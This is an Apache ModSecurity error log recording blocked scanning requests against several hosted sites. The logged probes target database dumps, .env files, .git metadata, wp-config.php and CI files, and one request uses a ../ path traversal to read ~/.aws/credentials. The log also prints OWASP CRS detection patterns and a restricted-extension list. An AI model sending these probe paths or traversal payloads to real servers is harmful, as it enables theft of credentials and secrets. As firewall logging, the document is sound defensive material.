[Tue Nov 11 19:36:19.450251 2025] [:error] [pid 4188409] [client 62.60.131.162:50900] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aROCI6Agmgp3OElyveQq-AAAAB4"]
[Tue Nov 11 19:36:19.451422 2025] [:error] [pid 4188409] [client 62.60.131.162:50900] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aROCI6Agmgp3OElyveQq-AAAAB4"]
[Tue Nov 11 19:36:19.503129 2025] [:error] [pid 4188465] [client 62.60.131.162:54087] [client 62.60.131.162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCIw56XZvWdMIW6S1AKwAAAEU"]
[Tue Nov 11 19:36:19.503218 2025] [:error] [pid 4188465] [client 62.60.131.162:54087] [client 62.60.131.162] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCIw56XZvWdMIW6S1AKwAAAEU"]
[Tue Nov 11 19:36:19.503254 2025] [:error] [pid 4188465] [client 62.60.131.162:54087] [client 62.60.131.162] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCIw56XZvWdMIW6S1AKwAAAEU"]
[Tue Nov 11 19:36:19.503967 2025] [:error] [pid 4188465] [client 62.60.131.162:54087] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCIw56XZvWdMIW6S1AKwAAAEU"]
[Tue Nov 11 19:36:19.504145 2025] [:error] [pid 4188465] [client 62.60.131.162:54087] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCIw56XZvWdMIW6S1AKwAAAEU"]
[Tue Nov 11 19:36:19.510334 2025] [:error] [pid 4188466] [client 62.60.131.162:55529] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aROCI5hUGobSsM8OiEyeagAAAEY"]
[Tue Nov 11 19:36:19.510735 2025] [:error] [pid 4188466] [client 62.60.131.162:55529] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aROCI5hUGobSsM8OiEyeagAAAEY"]
[Tue Nov 11 19:36:19.510919 2025] [:error] [pid 4188466] [client 62.60.131.162:55529] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aROCI5hUGobSsM8OiEyeagAAAEY"]
[Wed Nov 12 05:14:56.221543 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRQJwO0u00i18pVpDSPGTgAAAAY"]
[Wed Nov 12 05:14:56.221955 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRQJwO0u00i18pVpDSPGTgAAAAY"]
[Wed Nov 12 05:14:56.222147 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRQJwO0u00i18pVpDSPGTgAAAAY"]
[Wed Nov 12 05:14:56.401268 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRQJwI0A-UBLdRnyVSpnGAAAAAQ"]
[Wed Nov 12 05:14:56.401668 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRQJwI0A-UBLdRnyVSpnGAAAAAQ"]
[Wed Nov 12 05:14:56.401857 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRQJwI0A-UBLdRnyVSpnGAAAAAQ"]
[Wed Nov 12 05:14:56.736472 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRQJwO0u00i18pVpDSPGTwAAAAY"]
[Wed Nov 12 05:14:56.736875 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRQJwO0u00i18pVpDSPGTwAAAAY"]
[Wed Nov 12 05:14:56.737072 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRQJwO0u00i18pVpDSPGTwAAAAY"]
[Wed Nov 12 05:14:57.049421 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRQJwY0A-UBLdRnyVSpnGQAAAAQ"]
[Wed Nov 12 05:14:57.049819 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRQJwY0A-UBLdRnyVSpnGQAAAAQ"]
[Wed Nov 12 05:14:57.050014 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRQJwY0A-UBLdRnyVSpnGQAAAAQ"]
[Wed Nov 12 05:14:57.315954 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRQJwe0u00i18pVpDSPGUAAAAAY"]
[Wed Nov 12 05:14:57.316342 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRQJwe0u00i18pVpDSPGUAAAAAY"]
[Wed Nov 12 05:14:57.316536 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRQJwe0u00i18pVpDSPGUAAAAAY"]
[Wed Nov 12 05:14:57.724267 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRQJwY0A-UBLdRnyVSpnGgAAAAQ"]
[Wed Nov 12 05:14:57.724474 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRQJwY0A-UBLdRnyVSpnGgAAAAQ"]
[Wed Nov 12 05:14:57.725408 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRQJwY0A-UBLdRnyVSpnGgAAAAQ"]
[Wed Nov 12 05:14:57.725616 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRQJwY0A-UBLdRnyVSpnGgAAAAQ"]
[Wed Nov 12 05:14:58.002319 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRQJwu0u00i18pVpDSPGUQAAAAY"]
[Wed Nov 12 05:14:58.002718 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRQJwu0u00i18pVpDSPGUQAAAAY"]
[Wed Nov 12 05:14:58.002909 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRQJwu0u00i18pVpDSPGUQAAAAY"]
[Wed Nov 12 05:14:58.471297 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRQJwo0A-UBLdRnyVSpnGwAAAAQ"]
[Wed Nov 12 05:14:58.471711 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRQJwo0A-UBLdRnyVSpnGwAAAAQ"]
[Wed Nov 12 05:14:58.471921 2025] [:error] [pid 1399] [client 195.178.110.201:52846] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRQJwo0A-UBLdRnyVSpnGwAAAAQ"]
[Wed Nov 12 05:14:58.827268 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRQJwu0u00i18pVpDSPGUgAAAAY"]
[Wed Nov 12 05:14:58.827651 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRQJwu0u00i18pVpDSPGUgAAAAY"]
[Wed Nov 12 05:14:58.827871 2025] [:error] [pid 1629] [client 195.178.110.201:52850] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRQJwu0u00i18pVpDSPGUgAAAAY"]
[Wed Nov 12 06:33:58.960796 2025] [authz_core:error] [pid 6181] [client 143.110.213.72:56134] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
